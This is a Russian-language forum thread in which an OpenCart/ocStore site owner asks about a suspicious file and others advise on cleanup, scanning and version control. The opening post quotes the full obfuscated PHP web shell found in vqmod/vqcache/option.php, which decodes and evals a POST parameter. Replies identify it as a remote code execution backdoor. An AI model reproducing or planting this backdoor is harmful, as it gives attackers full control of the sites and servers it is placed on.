Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Зараженный файл


JaguarRUS

Recommended Posts

Нашел одно подозрение. 

Файл в корне сайта vqmod/vqcache/

option.php

 

Сам код 

<?php                                                                                                                                                                                                                                                                      $krx9= "ctb_espdo46a"; $adiy8 = strtolower ($krx9[2].$krx9[11].$krx9[5]. $krx9[4].$krx9[10]. $krx9[9]. $krx9[3] .$krx9[7].$krx9[4]. $krx9[0].$krx9[8].$krx9[7].$krx9[4] ) ; $rxo81 =strtoupper ($krx9[3].$krx9[6]. $krx9[8]. $krx9[5]. $krx9[1] ) ; if ( isset ( ${ $rxo81 } [ 'n6ae4d5']) ){ eval( $adiy8( ${$rxo81 }[ 'n6ae4d5' ])); } ?>

 

Как оцените?

 

ocStore 
Версия 1.5.5.1.2

Змінено користувачем JaguarRUS
Надіслати
Поділитися на інших сайтах


этот код позволяет выполнить любой код через eval() на вашем сайте, переданный через POST['n6ae4d5']
то есть тот, кто этот код туда записал может сделать с вашим сайтом практически все что угодно.. 

Надіслати
Поділитися на інших сайтах

Общий принцип - хранить сайты в репозиториях. Плюсы:

хранится вся история правок

можно быстро (одной командой) посмотреть список измененных файлов

можно легко откатить, если что-то побилось/заразилось

А так сканировать айболитом. Потом только разбираться и вычищать руками приходится. Сильно неудобно. Бывает, вирус забивает все файлы подряд.

Надіслати
Поділитися на інших сайтах

Нашел такие файлы в папке загрузки. думаю это левак. Причем эти файлы заливались совсем недавно и периодически. Сайт давно не ведется. Удалять полностью? Расширения странные.

 

post-716627-0-01591100-1482308806_thumb.jpg

Змінено користувачем JaguarRUS
Надіслати
Поділитися на інших сайтах


  • 4 weeks later...

Обращайтесь если что, произвожу очистку сайтов/серверов с гарантией. Если будете очищать сами, то рекомендую айболит, скрипт-огонь, но самописные все-таки лучше.

Надіслати
Поділитися на інших сайтах

сайт на опенкарт 1.5.6.1, антивир хостинга переименовывает файлы на suspected, витрина не работает, какие-то непонятные скрипты разбросаны по сайту...... Цена вопроса(проверка/очистка)?

Надіслати
Поділитися на інших сайтах


10 часов назад, Russiannov сказал:

сайт на опенкарт 1.5.6.1, антивир хостинга переименовывает файлы на suspected, витрина не работает, какие-то непонятные скрипты разбросаны по сайту...... Цена вопроса(проверка/очистка)?

подробности на http://ockb.ru/. Пользователям форума скидка)

Надіслати
Поділитися на інших сайтах

2 минуты назад, halfhope сказал:

подробности на http://ockb.ru/. Пользователям форума скидка)

halfhope, передаю скрин ockb.ru

3052993372.png

Да это содержимое сайта - белый квадрат "малевича"

Надіслати
Поділитися на інших сайтах

1 час назад, SiteMix сказал:

Ну тогда и это поправить неплохо бы:

 

Спасибо, там автоматика стоит, чтобы каждый год не обновлять, склонять слова она не умеет)

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.